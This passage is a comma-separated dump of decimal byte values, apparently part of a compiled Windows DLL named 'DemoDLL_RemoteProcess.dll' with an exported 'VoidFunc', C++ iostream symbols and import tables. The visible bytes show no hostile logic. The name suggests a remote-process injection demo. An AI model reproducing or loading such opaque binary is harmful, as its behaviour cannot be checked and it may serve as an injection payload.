181,1,16,0,0,0,0,0,0,0,0,255,255,255,255,64,182,1,16,34,5,147,25,1,0,0,0,72,22,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,42,78,1,16,1,0,0,0,1,0,0,0,2,0,0,0,1,0,0,0,120,22,2,16,255,255,255,255,112,182,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,34,5,147,25,3,0,0,0,156,22,2,16,1,0,0,0,136,22,2,16,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,118,18,1,16,0,0,0,0,40,23,2,16,0,0,0,0,255,255,255,255,160,182,1,16,34,5,147,25,1,0,0,0,248,22,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,0,56,23,2,16,88,23,2,16,0,0,0,0,0,0,0,0,164,33,2,16,0,0,0,0,255,255,255,255,0,0,0,0,12,0,0,0,75,16,1,16,0,0,0,0,0,0,0,0,196,33,2,16,0,0,0,0,255,255,255,255,0,0,0,0,12,0,0,0,25,21,1,16,0,0,0,0,255,255,255,255,224,182,1,16,34,5,147,25,1,0,0,0,120,23,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,32,183,1,16,34,5,147,25,1,0,0,0,168,23,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,96,183,1,16,34,5,147,25,1,0,0,0,216,23,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,144,183,1,16,34,5,147,25,1,0,0,0,8,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,192,183,1,16,34,5,147,25,1,0,0,0,56,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,240,183,1,16,34,5,147,25,1,0,0,0,104,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,48,184,1,16,34,5,147,25,1,0,0,0,152,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,112,184,1,16,34,5,147,25,1,0,0,0,200,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,160,184,1,16,34,5,147,25,1,0,0,0,248,24,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0,0,0,0,0,32,112,1,16,64,0,0,0,0,0,0,0,0,0,0,0,80,112,1,16,255,255,255,255,0,0,0,0,255,255,255,255,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,34,5,147,25,4,0,0,0,72,25,2,16,2,0,0,0,140,25,2,16,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,2,0,0,0,2,0,0,0,3,0,0,0,1,0,0,0,56,25,2,16,0,0,0,0,0,0,0,0,3,0,0,0,1,0,0,0,40,25,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,250,16,1,16,0,0,0,0,216,25,2,16,0,0,0,0,2,0,0,0,232,25,2,16,88,23,2,16,0,0,0,0,0,0,0,0,232,33,2,16,0,0,0,0,255,255,255,255,0,0,0,0,12,0,0,0,217,19,1,16,0,0,0,0,255,255,255,255,0,185,1,16,34,5,147,25,1,0,0,0,8,26,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,64,185,1,16,34,5,147,25,1,0,0,0,56,26,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,128,185,1,16,34,5,147,25,1,0,0,0,104,26,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,208,185,1,16,34,5,147,25,1,0,0,0,152,26,2,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,254,255,255,255,0,0,0,0,208,255,255,255,0,0,0,0,254,255,255,255,0,0,0,0,178,136,1,16,0,0,0,0,120,136,1,16,147,136,1,16,0,0,0,0,0,0,0,0,254,255,255,255,0,0,0,0,204,255,255,255,0,0,0,0,254,255,255,255,0,0,0,0,35,138,1,16,0,0,0,0,254,255,255,255,0,0,0,0,188,255,255,255,0,0,0,0,254,255,255,255,36,142,1,16,42,142,1,16,0,0,0,0,254,255,255,255,0,0,0,0,188,255,255,255,0,0,0,0,254,255,255,255,230,142,1,16,236,142,1,16,0,0,0,0,254,255,255,255,0,0,0,0,212,255,255,255,0,0,0,0,254,255,255,255,0,0,0,0,130,150,1,16,0,0,0,0,254,255,255,255,0,0,0,0,216,255,255,255,0,0,0,0,254,255,255,255,69,151,1,16,82,151,1,16,0,0,0,0,254,255,255,255,0,0,0,0,184,255,255,255,0,0,0,0,254,255,255,255,105,154,1,16,131,154,1,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,242,155,216,86,0,0,0,0,178,29,2,0,1,0,0,0,1,0,0,0,1,0,0,0,168,29,2,0,172,29,2,0,176,29,2,0,110,21,1,0,204,29,2,0,0,0,68,101,109,111,68,76,76,95,82,101,109,111,116,101,80,114,111,99,101,115,115,46,100,108,108,0,86,111,105,100,70,117,110,99,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,98,97,115,105,99,95,111,102,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,105,111,115,95,98,97,115,101,64,115,116,100,64,64,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,95,73,111,115,98,64,72,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,98,97,115,105,99,95,102,105,108,101,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,98,97,100,95,99,97,115,116,64,115,116,100,64,64,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,101,120,99,101,112,116,105,111,110,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,168,252,1,16,0,0,0,0,46,63,65,86,98,97,100,95,97,108,108,111,99,64,115,116,100,64,64,0,0,0,0,0,0,0,0,0,78,230,64,187,177,25,191,68,168,252,1,16,0,0,0,0,46,63,65,86,116,121,112,101,95,105,110,102,111,64,64,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,255,255,255,255,255,255,255,255,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,49,2,0,0,0,0,0,0,0,0,0,62,66,2,0,24,52,2,0,64,50,2,0,0,0,0,0,0,0,0,0,234,68,2,0,88,53,2,0,80,48,2,0,0,0,0,0,0,0,0,0,150,72,2,0,104,51,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,134,70,2,0,150,70,2,0,172,70,2,0,180,70,2,0,210,70,2,0,232,70,2,0,252,70,2,0,18,71,2,0,36,71,2,0,48,71,2,0,66,71,2,0,82,71,2,0,102,71,2,0,122,71,2,0,150,71,2,0,180,71,2,0,206,71,2,0,222,71,2,0,244,71,2,0,10,72,2,0,36,72,2,0,48,72,2,0,60,72,2,0,78,72,2,0,100,72,2,0,116,72,2,0,136,72,2,0,118,70,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,130,61,2,0,166,61,2,0,200,61,2,0,14,62,2,0,78,62,2,0,182,62,2,0,238,62,2,0,12,63,2,0,44,63,2,0,70,63,2,0,106,63,2,0,168,63,2,0,196,63,2,0,236,63,2,0,6,64,2,0,62,61,2,0,100,64,2,0,136,64,2,0,172,64,2,0,218,64,2,0,28,65,2,0,128,65,2,0,158,65,2,0,220,65,2,0,254,65,2,0,30,66,2,0,76,66,2,0,120,66,2,0,164,66,2,0,18,61,2,0,224,60,2,0,160,60,2,0,84,60,2,0,46,60,2,0,226,59,2,0,166,59,2,0,144,59,2,0,78,59,2,0,24,59,2,0,214,58,2,0,150,58,2,0,128,54,2,0,84,58,2,0,18,58,2,0,210,57,2,0,144,57,2,0,78,57,2,0,24,57,2,0,210,56,2,0,140,56,2,0,72,56,2,0,12,56,2,0,204,55,2,0,144,55,2,0,90,55,2,0,240,54,2,0,182,54,2,0,48,64,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,142,68,2,0,174,68,2,0,206,68,2,0,248,68,2,0,10,69,2,0,24,69,2,0,36,69,2,0,52,69,2,0,72,69,2,0,84,69,2,0,98,69,2,0,112,69,2,0,130,69,2,0,140,69,2,0,154,69,2,0,162,69,2,0,172,69,2,0,194,69,2,0,214,69,2,0,12,70,2,0,48,70,2,0,74,70,2,0,90,70,2,0,102,70,2,0,126,68,2,0,118,68,2,0,108,68,2,0,98,68,2,0,88,68,2,0,80,68,2,0,70,68,2,0,36,68,2,0,4,68,2,0,234,67,2,0,212,67,2,0,182,67,2,0,164,67,2,0,142,67,2,0,132,67,2,0,116,67,2,0,96,67,2,0,86,67,2,0,74,67,2,0,64,67,2,0,56,67,2,0,46,67,2,0,34,67,2,0,24,67,2,0,8,67,2,0,250,66,2,0,228,66,2,0,218,66,2,0,106,67,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,134,70,2,0,150,70,2,0,172,70,2,0,180,70,2,0,210,70,2,0,232,70,2,0,252,70,2,0,18,71,2,0,36,71,2,0,48,71,2,0,66,71,2,0,82,71,2,0,102,71,2,0,122,71,2,0,150,71,2,0,180,71,2,0,206,71,2,0,222,71,2,0,244,71,2,0,10,72,2,0,36,72,2,0,48,72,2,0,60,72,2,0,78,72,2,0,100,72,2,0,116,72,2,0,136,72,2,0,118,70,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,130,61,2,0,166,61,2,0,200,61,2,0,14,62,2,0,78,62,2,0,182,62,2,0,238,62,2,0,12,63,2,0,44,63,2,0,70,63,2,0,106,63,2,0,168,63,2,0,196,63,2,0,236,63,2,0,6,64,2,0,62,61,2,0,100,64,2,0,136,64,2,0,172,64,2,0,218,64,2,0,28,65,2,0,128,65,2,0,158,65,2,0,220,65,2,0,254,65,2,0,30,66,2,0,76,66,2,0,120,66,2,0,164,66,2,0,18,61,2,0,224,60,2,0,160,60,2,0,84,60,2,0,46,60,2,0,226,59,2,0,166,59,2,0,144,59,2,0,78,59,2,0,24,59,2,0,214,58,2,0,150,58,2,0,128,54,2,0,84,58,2,0,18,58,2,0,210,57,2,0,144,57,2,0,78,57,2,0,24,57,2,0,210,56,2,0,140,56,2,0,72,56,2,0,12,56,2,0,204,55,2,0,144,55,2,0,90,55,2,0,240,54,2,0,182,54,2,0,48,64,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,142,68,2,0,174,68,2,0,206,68,2,0,248,68,2,0,10,69,2,0,24,69,2,0,36,69,2,0,52,69,2,0,72,69,2,0,84,69,2,0,98,69,2,0,112,69,2,0,130,69,2,0,140,69,2,0,154,69,2,0,162,69,2,0,172,69,2,0,194,69,2,0,214,69,2,0,12,70,2,0,48,70,2,0,74,70,2,0,90,70,2,0,102,70,2,0,126,68,2,0,118,68,2,0,108,68,2,0,98,68,2,0,88,68,2,0,80,68,2,0,70,68,2,0,36,68,2,0,4,68,2,0,234,67,2,0,212,67,2,0,182,67,2,0,164,67,2,0,142,67,2,0,132,67,2,0,116,67,2,0,96,67,2,0,86,67,2,0,74,67,2,0,64,67,2,0,56,67,2,0,46,67,2,0,34,67,2,0,24,67,2,0,8,67,2,0,250,66,2,0,228,66,2,0,218,66,2,0,106,67,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,117,0,63,63,49,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,85,65,69,64,88,90,0,0,126,0,63,63,49,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,85,65,69,64,88,90,0,0,28,0,63,63,48,63,36,98,97,115,105,99,95,111,115,116,114,101,97,109,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,64,80,65,86,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,49,64,95,78,64,90,0,3,0,63,63,48,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,64,88,90,0,0,164,2,63,99,108,101,97,114,64,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,88,72,95,78,64,90,0,167,5,63,115,101,116,115,116,97,116,101,64,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,88,72,95,78,64,90,0,0,129,0,63,63,49,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,85,65,69,64,88,90,0,0,183,5,63,115,104,111,119,109,97,110,121,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,77,65,69,95,74,88,90,0,64,6,63,120,115,103,101,116,110,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,77,65,69,95,74,80,65,68,95,74,64,90,0,67,6,63,120,115,112,117,116,110,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,77,65,69,95,74,80,66,68,95,74,64,90,0,241,4,63,111,117,116,64,63,36,99,111,100,101,99,118,116,64,68,68,72,64,115,116,100,64,64,81,66,69,72,65,65,72,80,66,68,49,65,65,80,66,68,80,65,68,51,65,65,80,65,68,64,90,0,100,2,63,95,80,110,105,110,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,80,65,68,88,90,0,125,3,63,101,112,112,116,114,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,66,69,80,65,68,88,90,0,0,3,5,63,112,112,116,114,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,66,69,80,65,68,88,90,0,238,1,63,95,71,110,100,101,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,80,65,68,88,90,0,109,3,63,101,98,97,99,107,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,66,69,80,65,68,88,90,0,0,253,3,63,103,112,116,114,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,66,69,80,65,68,88,90,0,112,3,63,101,103,112,116,114,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,66,69,80,65,68,88,90,0,0,59,4,63,105,110,64,63,36,99,111,100,101,99,118,116,64,68,68,72,64,115,116,100,64,64,81,66,69,72,65,65,72,80,66,68,49,65,65,80,66,68,80,65,68,51,65,65,80,65,68,64,90,0,0,241,1,63,95,71,110,105,110,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,80,65,68,88,90,0,162,1,63,95,66,65,68,79,70,70,64,115,116,100,64,64,51,95,74,66,0,0,38,0,63,63,48,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,64,88,90,0,0,247,3,63,103,101,116,108,111,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,66,69,63,65,86,108,111,99,97,108,101,64,50,64,88,90,0,0,179,1,63,95,70,105,111,112,101,110,64,115,116,100,64,64,89,65,80,65,85,95,105,111,98,117,102,64,64,80,66,68,72,72,64,90,0,0,0,2,63,95,73,110,105,116,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,88,80,65,80,65,68,48,80,65,72,48,48,49,64,90,0,0,1,2,63,95,73,110,105,116,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,88,88,90,0,0,32,6,63,117,110,115,104,105,102,116,64,63,36,99,111,100,101,99,118,116,64,68,68,72,64,115,116,100,64,64,81,66,69,72,65,65,72,80,65,68,49,65,65,80,65,68,64,90,0,0,156,2,63,97,108,119,97,121,115,95,110,111,99,111,110,118,64,99,111,100,101,99,118,116,95,98,97,115,101,64,115,116,100,64,64,81,66,69,95,78,88,90,0,0,156,5,63,115,101,116,103,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,73,65,69,88,80,65,68,48,48,64,90,0,0,168,1,63,95,68,101,98,117,103,95,109,101,115,115,97,103,101,64,115,116,100,64,64,89,65,88,80,66,95,87,48,73,64,90,0,0,55,6,63,119,105,100,116,104,64,105,111,115,95,98,97,115,101,64,115,116,100,64,64,81,65,69,95,74,95,74,64,90,0,0,211,5,63,115,112,117,116,110,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,95,74,80,66,68,95,74,64,90,0,0,208,5,63,115,112,117,116,99,64,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,65,69,72,68,64,90,0,86,5,63,114,100,98,117,102,64,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,66,69,80,65,86,63,36,98,97,115,105,99,95,115,116,114,101,97,109,98,117,102,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,50,64,88,90,0,0,149,3,63,102,105,108,108,64,63,36,98,97,115,105,99,95,105,111,115,64,68,85,63,36,99,104,97,114,95,116,114,97,105,116,115,64,68,64,115,116,100,64,64,64,115,116,100,64,64,81,66,69,68,88,90,0,155,3,63,102,108,97,103,115,64,105,111,115,95,98,97,115,101,64,115,116,100,64,64,81,66,69,72,88,90,0,56,6,63,119,105,100,116,104,64,105,111,115,95,98,97,115,101,64,115,116,100,64,64,81,66,69,95,74,88,90,0,0,158,0,63,63,49,95,76,111,99,107,105,116,64,115,116,100,64,64,81,65,69,64,88,90,0,0,254,1,63,95,73,110,99,114,101,102,64,102,97,99,101,116,64,108,111,99,97,108,101,64,115,116,100,64,64,81,65,69,88,88,90,0,187,1,63,95,71,101,116,99,97,116,64,63,36,99,111,100,101,99,118,116,64,68,68,72,64,115,116,100,64,64,83,